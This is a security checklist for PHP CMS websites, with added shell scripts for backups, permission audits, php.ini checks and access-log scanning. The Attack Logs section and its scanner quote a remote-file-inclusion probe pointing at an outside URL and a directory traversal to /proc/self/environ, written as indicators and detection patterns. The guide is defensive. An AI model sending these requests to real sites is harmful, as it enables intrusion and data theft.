Website Security Checklist

Security Checklist for your Website

Here is the complete security checklist for your website. It applies to websites built on Joomla, WordPress, Drupal or any other PHP-based CMS.

Before the checklist itself, first things first: always have backups. That is the only fool-proof way to recover from a screw-up; everything else is secondary. Skilled hackers have ways into everything, but they are not the ones creating havoc. It is the wannabe hackers who deface or hack your website, so essentially you are up against these wannabes, who can be dangerous at times.

Make a habit of reviewing your website against this security checklist weekly or monthly. It also helps to keep up with the security updates for your CMS and your hosting control panel, so that you can apply the required updates yourself without waiting for your developer to do it for you. Be alert! Be very alert!

Alright. So arm yourself with this security checklist and you shall be spared 🙂

  • Nameserver

Make sure your nameserver settings are working. Run a DNS check for your website; tools like Pingdom and Domaintools can help you do that. Also make sure you renew the domain that serves as your nameserver: if that domain lapses, every other website using the same nameserver goes down with it.

  • Limit IP Access to your Hosting Control Panel

Limit access to your hosting control panel with IP access control. If you use cPanel, the IP Access Control tool is in the Security menu. Add the IP addresses you use to log in to the control panel, set them to Allow, and set all other addresses to Deny. That's it.

  • FTP Server Enable/Disable

If you use the cPanel File Manager to manage your files, it is recommended to turn the FTP server off. This, together with IP access control for cPanel, is the best setting to prevent unwanted access to your server. To disable the FTP server in WHM: log in to Web Host Manager (WHM), go to FTP Server Selection, and choose the option to disable the FTP server.

  • Limited IP Access to your Website Backend

Almost all PHP-based CMSs have a feature or extension to limit backend access to selected IP addresses: Joomla has Admin Tools, WordPress has Better WP Security.

  • Super Admin Password changes

Change your password monthly. Keep it long and strong: use letters, numbers and special characters.

  • Backups Generated and Segregated

Generate a fresh backup every week. Use cPanel's Backup Wizard to automate backups of the complete website or part of it. Keep backups from the past few weeks, both offline and online. Segregate them and prevent direct access to them: if hackers get hold of your backup files, that is catastrophic. Keep backup copies on your PC/Mac in password-protected folders.
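As an added example (not from the original post), here is a shell script that implements the weekly backup with rotation and segregation described above. It assumes a Linux/Unix host with `tar` and `gzip`, a backup directory outside the web root, and that the database is dumped separately; the paths in the comments are placeholders.

```sh
#!/bin/sh
# Added example: weekly site backup with rotation and a readability check.
# Assumptions: POSIX sh, tar and gzip available; database dumps are produced
# separately and can be dropped into the same backup directory.

# backup_site <site_dir> <backup_dir> <label> <keep>
# Archives <site_dir> into <backup_dir>/site-<label>.tar.gz, makes the archive
# readable by the owner only, and keeps just the newest <keep> archives
# (labels are expected to sort chronologically, e.g. 2013-W01).
backup_site() {
    site_dir=$1; backup_dir=$2; label=$3; keep=$4
    mkdir -p "$backup_dir"
    chmod 700 "$backup_dir"          # segregated: no group/world access
    archive="$backup_dir/site-$label.tar.gz"
    # -C stores relative paths, so the archive does not reveal the absolute web root
    tar -czf "$archive" -C "$(dirname "$site_dir")" "$(basename "$site_dir")"
    chmod 600 "$archive"
    prune_backups "$backup_dir" "$keep"
}

# Delete the oldest archives so that at most <keep> remain.
prune_backups() {
    backup_dir=$1; keep=$2
    total=$(count_backups "$backup_dir")
    excess=$((total - keep))
    [ "$excess" -gt 0 ] || return 0
    ls "$backup_dir"/site-*.tar.gz | sort | head -n "$excess" | while read -r old; do
        rm -f "$old"
    done
}

# Number of archives currently kept.
count_backups() {
    ls "$1"/site-*.tar.gz 2>/dev/null | wc -l | tr -d ' '
}

# Exit status 0 only if the archive can be read back; run this before trusting a backup.
verify_backup() {
    tar -tzf "$1" >/dev/null 2>&1
}

# Typical weekly call (placeholder paths):
# backup_site /home/example/public_html /home/example/backups "$(date +%Y-W%V)" 4
```

Run it from cron once a week; the `chmod 700`/`chmod 600` steps are what keeps the archives segregated from the web server and other accounts on the host, and `verify_backup` is the check worth running before you rely on any archive.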

  • CMS Version Check

Always use the latest stable version of your CMS. Whenever an update is available, install it, and take a backup of your files and database before you run the update.

  • File Permissions

Go to File Manager and set directory permissions to 755 and file permissions to 644.

  • Consider Using PHP open_basedir

Consider enabling open_basedir. This directive limits the files PHP can open to the specified directory tree, and it is not affected by whether Safe Mode is on or off.

  • Attack Logs

Your web server's log file is the clue to which extensions are being targeted. Here are two examples of what to look for (a remote file inclusion attempt and a directory traversal attempt):

//administrator/components/com_extension/admin.extension.php?mosConfig.absolute.path=http:

or

../../../../../../../../../../../../../../../../proc/self/environ
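As an added example (not from the original post), the following shell script scans an Apache-style access log for the two indicators quoted above. The log lines are constructed for the demo, using RFC 5737 documentation addresses; point `scan_attack_log` at your real access log instead.

```sh
#!/bin/sh
# Added example: flag access-log lines that carry the two indicators quoted
# above (a URL injected into a parameter, and a ../ chain reaching
# /proc/self/environ). Assumption: Apache "combined" log format, with the
# request path in field 7.

# Constructed sample log; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG='203.0.113.5 - - [01/Jan/2013:10:00:01 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5120
203.0.113.77 - - [01/Jan/2013:10:00:02 +0000] "GET //administrator/components/com_extension/admin.extension.php?mosConfig.absolute.path=http://198.51.100.20/x.txt? HTTP/1.1" 404 210
198.51.100.9 - - [01/Jan/2013:10:00:03 +0000] "GET /index.php?page=../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 210
203.0.113.5 - - [01/Jan/2013:10:00:04 +0000] "GET /images/logo.png HTTP/1.1" 200 880'
SAMPLE_FILE=$(mktemp)
printf '%s\n' "$SAMPLE_LOG" > "$SAMPLE_FILE"

# Print every line whose request contains a parameter set to a URL, a chain of
# three or more ../, or /proc/self/environ. Case-insensitive so that case
# variants of the scheme or path are caught as well.
scan_attack_log() {
    grep -E -i '=https?:|(\.\./){3,}|/proc/self/environ' "$1"
}

# Number of flagged lines (0 when the log is clean).
count_attack_lines() {
    scan_attack_log "$1" | wc -l | tr -d ' '
}

# Flagged lines grouped by client IP and requested path, most frequent first:
# the path tells you which extension is being probed, the IP whom to block.
top_targets() {
    scan_attack_log "$1" | awk '{ print $1, $7 }' | sort | uniq -c | sort -rn
}

echo "Suspicious requests in $SAMPLE_FILE:"
scan_attack_log "$SAMPLE_FILE"
echo "By client and path:"
top_targets "$SAMPLE_FILE"
```

A hit for a path under `components/` or `administrator/components/` names the extension being probed; check that extension's version against the vendor's updates, and feed the client addresses into the IP access controls discussed above.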

  • Email Settings for your website contacts

Check weekly to ensure that the correct email addresses are entered to receive messages from your website's contact form. Some wannabe hackers log in to your "insecure" website and change nothing but the email addresses in your contact form and online store; their goal is to clandestinely collect your enquiries without you knowing about it.

  • Payment Settings for your Products

Be very aware of this. You may not expect hackers to do it, but some do, for the sole purpose of grabbing money from your customers' transactions. It mostly happens to sites that have PayPal Payments enabled as one of their payment gateways: hackers break into the site, change the PayPal email address to their own and let customer transactions flow into their account. By the time you notice, considerable damage has already been done.

  • Database Username/Password

Change the database suffix, database username and database password regularly. Set the configuration file's permission to 444 to prevent it being rewritten from the backend in case a hacker gains access to your website.

  • Backend Configuration Settings

Set the backend site configuration to the most secure settings available.

  • Online Store Configuration Settings

Set the secure site URL of your online store to HTTPS if possible. Enable encryption for customers' credit card data if you store it in your database. Make your configuration file unwritable from the backend by setting its permission to 444. Make sure the email address field holds your email address for all correspondence from your online store.

  • Frontend Editing Access

Disable Frontend editing if you do not need it.

  • .Htaccess for your files

Use .htaccess wherever possible. You can use it to limit direct access to a file or folder, or to limit access to a selected pool of IP addresses. Set your .htaccess file permission to 444.
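As an added example (not from the original post), here is a shell script that audits a web root for exactly the scheme given in this checklist (755 for directories and 644 for files from the File Permissions item, 444 for the configuration file and .htaccess from the Database, Online Store and .htaccess items) and applies it. It assumes shell access to a Linux/Unix host; `configuration.php` is Joomla's configuration file name, so adjust `READONLY_FILES` for your CMS.

```sh
#!/bin/sh
# Added example: audit and enforce the permission scheme from this checklist:
# directories 755, regular files 644, configuration file and .htaccess 444.
# Assumption: shell access to a Linux/Unix host; configuration.php is the
# Joomla configuration file name, adjust READONLY_FILES for other CMSs.
READONLY_FILES="configuration.php .htaccess"

# Expected mode for a given file name: 444 for the read-only set, else 644.
expected_mode() {
    mode=644
    for ro in $READONLY_FILES; do
        if [ "$1" = "$ro" ]; then mode=444; fi
    done
    echo "$mode"
}

# Print one line per deviation as "expected-<mode> <path>"; prints nothing when clean.
audit_permissions() {
    root=$1
    find "$root" -type d ! -perm 755 | sed 's/^/expected-755 /'
    find "$root" -type f | while read -r f; do
        want=$(expected_mode "${f##*/}")
        # find on a single path with -perm <mode> prints it only on an exact match
        if ! find "$f" -perm "$want" | grep -q .; then
            echo "expected-$want $f"
        fi
    done
}

# Number of deviations, for a quick pass/fail in a weekly cron job.
count_findings() {
    audit_permissions "$1" | wc -l | tr -d ' '
}

# Apply the scheme (what the File Manager steps above do by hand).
apply_permissions() {
    root=$1
    find "$root" -type d -exec chmod 755 {} +
    find "$root" -type f -exec chmod 644 {} +
    for ro in $READONLY_FILES; do
        find "$root" -type f -name "$ro" -exec chmod 444 {} +
    done
}

# Constructed throwaway web root with two deliberate deviations so the example
# runs anywhere; in real use call audit_permissions on the actual web root.
make_fixture() {
    root=$(mktemp -d)/public_html
    mkdir -p "$root/images" "$root/administrator"
    printf '<?php\n' > "$root/index.php"
    printf '<?php\n' > "$root/configuration.php"
    printf 'Options -Indexes\n' > "$root/.htaccess"
    apply_permissions "$root"
    chmod 777 "$root/images"             # deviation 1: world-writable directory
    chmod 666 "$root/configuration.php"  # deviation 2: writable configuration file
    echo "$root"
}

demo_root=$(make_fixture)
echo "Before:"; audit_permissions "$demo_root"
apply_permissions "$demo_root"
echo "After: $(count_findings "$demo_root") deviation(s)"
```

The audit is the part worth scheduling: a directory that has drifted to 777 or a configuration file that is writable again is exactly the change a compromised extension or a careless installer leaves behind, and a non-zero `count_findings` is a cheap weekly signal.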

  • PHP.ini Settings

Implement optimum settings in php.ini. Most hosting providers already have the best possible security settings in place in their php.ini files, but just to be sure, cross-check them.
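As an added example (not from the original post) covering both the open_basedir item and this php.ini cross-check, here is a shell script that reads a php.ini and reports the settings worth confirming with your host. It assumes standard directive names (`open_basedir`, `allow_url_include`, `display_errors`, `expose_php`) in a plain "key = value" ini file; the two sample files and the path in them are constructed for the demo. On a live host, run it against the php.ini your control panel exposes.

```sh
#!/bin/sh
# Added example: cross-check a php.ini for open_basedir and a few directives
# whose permissive values widen the attack surface. Assumption: standard
# directive names; the ini file uses "key = value" lines with ';' comments.

# Print the value of directive $1 from ini text on stdin; nothing if absent.
ini_value() {
    awk -v key="$1" -F'=' '
        /^[ \t]*;/ { next }                      # skip comment lines
        {
            k = $1; gsub(/^[ \t]+|[ \t]+$/, "", k)
            if (k == key) {
                v = $2; gsub(/^[ \t]+|[ \t]+$/, "", v)
                print v; exit
            }
        }'
}

# Report findings for the ini file in $1, one per line.
audit_php_ini() {
    base=$(ini_value open_basedir < "$1")
    if [ -z "$base" ] || [ "$base" = "none" ]; then
        echo "open_basedir is missing: PHP may open files anywhere on the host"
    fi
    # Directives that should be Off on a production host:
    #   allow_url_include: lets a parameter set to http:... (see Attack Logs) pull in remote code
    #   display_errors:    shows file paths and query details to visitors
    #   expose_php:        advertises the PHP version in response headers
    for d in allow_url_include display_errors expose_php; do
        v=$(ini_value "$d" < "$1" | tr 'A-Z' 'a-z')
        case "$v" in
            on|1|true|yes) echo "$d is enabled" ;;
            "")            echo "$d is not set explicitly; confirm the effective default" ;;
        esac
    done
}

# Number of definite findings (unset directives are warnings, not counted).
php_ini_findings() {
    audit_php_ini "$1" | grep -v 'not set explicitly' | wc -l | tr -d ' '
}

# Constructed samples: a permissive php.ini and the same directives hardened.
WEAK_INI=$(mktemp)
cat > "$WEAK_INI" <<'EOF'
; constructed sample: permissive settings
allow_url_include = On
display_errors = On
expose_php = On
EOF

HARDENED_INI=$(mktemp)
cat > "$HARDENED_INI" <<'EOF'
; constructed sample: hardened settings (placeholder path)
open_basedir = /home/example/public_html:/tmp
allow_url_include = Off
display_errors = Off
expose_php = Off
EOF

echo "weak:     $(php_ini_findings "$WEAK_INI") finding(s)"
echo "hardened: $(php_ini_findings "$HARDENED_INI") finding(s)"
```

Note that php.ini is not the only place these values come from: a per-directory `.user.ini` or the host's PHP selector can override them, so when the file looks clean, confirm the effective values as the web server sees them before ticking this item off.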
